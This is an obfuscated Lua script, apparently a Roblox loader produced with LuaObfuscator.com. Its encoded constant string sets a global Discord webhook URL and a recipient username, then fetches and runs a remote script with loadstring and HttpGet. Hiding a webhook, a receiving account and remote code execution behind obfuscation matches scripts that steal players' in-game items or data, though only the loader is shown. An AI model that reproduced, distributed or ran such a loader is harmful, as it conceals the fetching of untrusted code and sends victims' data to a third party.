--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v79=v2(v0(v30,16));if v19 then local v86=v5(v79,v19);v19=nil;return v86;else return v79;end end end);local function v20(v31,v32,v33)if v33 then local v80=(v31/((5 -3)^(v32-(2 -1))))%((879 -(282 + 595))^(((v33-((1638 -(1523 + 114)) -0)) -(v32-((2 + 0) -1))) + (620 -(555 + 64)))) ;return v80-(v80%(932 -((1221 -364) + 74))) ;else local v81=568 -(367 + 201) ;local v82;while true do if (v81==0) then v82=2^(v32-((1993 -(68 + 997)) -(214 + 713))) ;return (((v31%(v82 + v82))>=v82) and (1 + 0)) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * 256) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (120 -(32 + 85)) );v18=v18 + 4 + 0 ;return (v40 * 16777216) + (v39 * (14533 + 51003)) + (v38 * 256) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1 + 0 ;local v44=(v20(v42,958 -(892 + 65) ,47 -27 ) * ((3 -1)^(58 -26))) + v41 ;local v45=v20(v42,(1544 -1173) -(87 + 263) ,211 -(67 + 113) );local v46=((v20(v42,32)==(1 + 0)) and  -((2 + 0) -1)) or (792 -(368 + 423)) ;if (v45==((0 + 0) -0)) then if (v44==(0 + 0)) then return v46 * ((0 -0) -(0 -0)) ;else v45=443 -((1275 -(814 + 45)) + 26) ;v43=0 -0 ;end elseif (v45==(2999 -((1975 -1173) + 150))) then return ((v44==(0 -(772 -(201 + 571)))) and (v46 * ((439 -(145 + (1431 -(116 + 1022))))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(745 + 278) ) * (v43 + (v44/(((54 + 945) -(915 + 82))^(147 -95)))) ;end local function v25(v47)local v48=0 + (766 -(745 + 21)) ;local v49;local v50;while true do if (v48==(888 -(90 + 171 + 624))) then return v6(v50);end if (v48==0) then v49=nil;if  not v47 then local v95=0 -0 ;while true do if (v95==(1080 -(1020 + 60))) then v47=v23();if (v47==(1423 -(630 + (2181 -1388)))) then return "";end break;end end end v48=3 -2 ;end if (v48==(9 -7)) then v50={};for v87=1 + 0 , #v49 do v50[v87]=v2(v1(v3(v49,v87,v87)));end v48=3;end if (v48==(3 -2)) then v49=v3(v16,v18,(v18 + v47) -(1748 -(760 + 987)) );v18=v18 + v47 ;v48=1915 -((7017 -5228) + 124) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==(1214 -(323 + 889))) then v56=nil;v57=nil;v51=7 -4 ;end if (v51==(242 -(187 + 54))) then v54=nil;v55=nil;v51=2;end if (v51~=(320 -(53 + 267))) then else v52=780 -(162 + 618) ;v53=nil;v51=1 + 0 ;end if ((2 + 1)==v51) then v58=nil;while true do local v89=982 -(18 + 964) ;local v90;while true do if (v89~=(0 -0)) then else v90=0 -0 ;while true do if (v90==(0 -0)) then if (v52~=(0 + 0)) then else local v121=1636 -(1373 + 263) ;while true do if ((2 + 0)==v121) then v52=1;break;end if (v121==(1000 -(451 + 549))) then v53={};v54={};v121=1 + 0 ;end if ((1 + 0)==v121) then v55={};v56={v53,v54,nil,v55};v121=1386 -(746 + 638) ;end end end if (v52==1) then local v122=0 + 0 ;local v123;while true do if (v122==(0 -0)) then v123=341 -(218 + 123) ;while true do if (v123==(1583 -(1535 + 46))) then v52=1 + 1 ;break;end if (v123==(0 + 0)) then v57=v23();v58={};v123=1 + 0 ;end if (v123~=(1 -0)) then else local v160=560 -(306 + 254) ;while true do if (1==v160) then v123=1 + 1 ;break;end if (v160==(0 -0)) then for v162=2 -1 ,v57 do local v163=0;local v164;local v165;local v166;local v167;local v168;while true do if (v163==2) then v168=nil;while true do if (v164~=0) then else local v176=1467 -(899 + 568) ;while true do if (0==v176) then v165=1551 -(1126 + 425) ;v166=nil;v176=1 + 0 ;end if (v176==(2 -1)) then v164=3 -2 ;break;end end end if (v164~=(604 -(268 + 335))) then else local v177=290 -(60 + 230) ;while true do if (v177~=(572 -(426 + 146))) then else v167=nil;v168=nil;v177=1 + 0 ;end if (v177==(378 -(142 + 235))) then v164=9 -7 ;break;end end end if (v164==(1458 -(282 + 1174))) then while true do if (v165==1) then v168=nil;while true do if (v166~=0) then else local v187=0;local v188;while true do if (v187==(977 -(553 + 424))) then v188=811 -(569 + 242) ;while true do if ((1 -0)==v188) then v166=2 -1 ;break;end if (v188~=(0 + 0)) then else local v196=0 + 0 ;local v197;while true do if (v196==(0 + 0)) then v197=1024 -(706 + 318) ;while true do if (v197==(1251 -(721 + 530))) then local v200=0 + 0 ;while true do if (v200~=(1271 -(945 + 326))) then else v167=v21();v168=nil;v200=2 -1 ;end if (v200~=1) then else v197=1 + 0 ;break;end end end if ((2 -1)==v197) then v188=1 + 0 ;break;end end break;end end end end break;end end end if (v166==1) then if (v167==1) then v168=v21()~=(700 -(271 + 429)) ;elseif (v167==(2 + 0)) then v168=v24();elseif (v167==(1503 -(1408 + 92))) then v168=v25();end v58[v162]=v168;break;end end break;end if ((0 + 0)==v165) then local v180=1086 -(461 + 625) ;while true do if (v180==0) then v166=1288 -(993 + 295) ;v167=nil;v180=1;end if (v180==1) then v165=1 + 0 ;break;end end end end break;end end break;end if (v163==(1172 -(418 + 753))) then v166=nil;v167=nil;v163=2;end if (v163~=0) then else v164=0 + 0 ;v165=nil;v163=1 + 0 ;end end end v56[1 + 2 ]=v21();v160=1 + 0 ;end end end end break;end end end v90=1 + 0 ;end if (v90==(530 -(406 + 123))) then if (v52==2) then local v124=0;while true do if (v124~=1) then else return v56;end if (v124==0) then for v154=1770 -(1749 + 20) ,v23() do local v155=731 -(476 + 255) ;local v156;local v157;while true do if (v155==(1131 -(369 + 761))) then while true do if (v156~=(0 + 0)) then else v157=v21();if (v20(v157,1 + 0 ,1323 -(1249 + 73) )~=(0 + 0)) then else local v169=0;local v170;local v171;local v172;while true do if (v169==(1146 -(466 + 679))) then local v173=0 -0 ;while true do if (v173==(2 -1)) then v169=2;break;end if (v173==(0 -0)) then v172={v22(),v22(),nil,nil};if (v170==(0 + 0)) then local v181=0 + 0 ;local v182;while true do if (v181~=(0 + 0)) then else v182=0;while true do if (v182~=(1900 -(106 + 1794))) then else v172[3]=v22();v172[1508 -(363 + 1141) ]=v22();break;end end break;end end elseif (v170==(1581 -(1183 + 397))) then v172[1 + 2 ]=v23();elseif (v170==(1 + 1)) then v172[8 -5 ]=v23() -((5 -3)^(12 + 4)) ;elseif (v170~=(117 -(4 + 110))) then else local v194=0;local v195;while true do if (v194==(584 -(57 + 527))) then v195=1427 -(41 + 1386) ;while true do if ((0 + 0)==v195) then v172[3]=v23() -(2^(119 -(17 + 86))) ;v172[10 -6 ]=v22();break;end end break;end end end v173=1 + 0 ;end end end if (v169==(3 -1)) then local v174=0 -0 ;while true do if ((166 -(122 + 44))==v174) then if (v20(v171,1,1)==1) then v172[2 -0 ]=v58[v172[1663 -(1477 + 184) ]];end if (v20(v171,2,6 -4 )~=(1 + 0)) then else v172[3 + 0 ]=v58[v172[1 + 2 ]];end v174=1;end if (v174==(1 -0)) then v169=8 -5 ;break;end end end if ((0 -0)~=v169) then else v170=v20(v157,2,3);v171=v20(v157,4 + 0 ,6);v169=1;end if (v169==(479 -(41 + 435))) then if (v20(v171,3,68 -(30 + 35) )==1) then v172[4 + 0 ]=v58[v172[1129 -(936 + 189) ]];end v53[v154]=v172;break;end end end break;end end break;end if (v155~=(0 + 0)) then else v156=0 + 0 ;v157=nil;v155=1614 -(1565 + 48) ;end end end for v158=1258 -(1043 + 214) ,v23() do v54[v158-1 ]=v28();end v124=3 -2 ;end end end break;end end break;end end end break;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=1;local v70= -1;local v71={};local v72={...};local v73=v12("#",...) -1 ;local v74={};local v75={};for v83=0,v73 do if (v83>=v67) then v71[v83-v67 ]=v72[v83 + 1 ];else v75[v83]=v72[v83 + 1 ];end end local v76=(v73-v67) + 1 ;local v77;local v78;while true do v77=v65[v69];v78=v77[1];if (v78<=10) then if (v78<=4) then if (v78<=1) then if (v78==0) then v75[v77[2]]=v77[3]~=0 ;else local v97=v77[2];local v98,v99=v68(v75[v97](v13(v75,v97 + 1 ,v77[3])));v70=(v99 + v97) -1 ;local v100=0;for v115=v97,v70 do v100=v100 + 1 ;v75[v115]=v98[v100];end end elseif (v78<=2) then v75[v77[2]]=v77[3];elseif (v78==3) then if (v75[v77[2]]==v77[4]) then v69=v69 + 1 ;else v69=v77[3];end else v75[v77[2]]=v61[v77[3]];end elseif (v78<=7) then if (v78<=5) then local v103=v77[2];local v104,v105=v68(v75[v103](v13(v75,v103 + 1 ,v77[3])));v70=(v105 + v103) -1 ;local v106=0;for v118=v103,v70 do v106=v106 + 1 ;v75[v118]=v104[v106];end elseif (v78==6) then v75[v77[2]]=v61[v77[3]];else v69=v77[3];end elseif (v78<=8) then local v107=0;local v108;local v109;while true do if (v107==0) then v108=v77[2];v109=v75[v77[3]];v107=1;end if (v107==1) then v75[v108 + 1 ]=v109;v75[v108]=v109[v77[4]];break;end end elseif (v78==9) then do return;end else v75[v77[2]]=v77[3];end elseif (v78<=15) then if (v78<=12) then if (v78==11) then v75[v77[2]][v77[3]]=v77[4];else local v112=0;local v113;while true do if (v112==0) then v113=v77[2];v75[v113]=v75[v113](v13(v75,v113 + 1 ,v70));break;end end end elseif (v78<=13) then v75[v77[2]]();elseif (v78==14) then v75[v77[2]][v77[3]]=v77[4];else v75[v77[2]]=v77[3]~=0 ;end elseif (v78<=18) then if (v78<=16) then v69=v77[3];elseif (v78==17) then if (v75[v77[2]]==v77[4]) then v69=v69 + 1 ;else v69=v77[3];end else local v135=v77[2];v75[v135]=v75[v135](v13(v75,v135 + 1 ,v70));end elseif (v78<=19) then v75[v77[2]]();elseif (v78>20) then do return;end else local v137=0;local v138;local v139;while true do if (v137==0) then v138=v77[2];v139=v75[v77[3]];v137=1;end if (v137==1) then v75[v138 + 1 ]=v139;v75[v138]=v139[v77[4]];break;end end end v69=v69 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31323033393534313734363937343831342F4F3847784278507A7337722O68335272736A477A7943592D6632546B724A50704F664871754466756965366A77666874486E4F6866676E4D462O4C5938796D55324C3773030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030F3O0074726963657261746F70735F64716503093O00557365724E616D653203013O002000173O00120A3O00013O0026113O000E000100020004103O000E0001001206000100033O00300B000100040005001206000100063O001206000200073O00201400020002000800120A000400096O000500014O0005000200054O000C00013O00022O000D0001000100010004103O001600010026113O0001000100010004103O00010001001206000100033O00300B0001000A000B001206000100033O00300B0001000C000D00120A3O00023O0004103O000100012O00093O00017O00",v9(),...);end
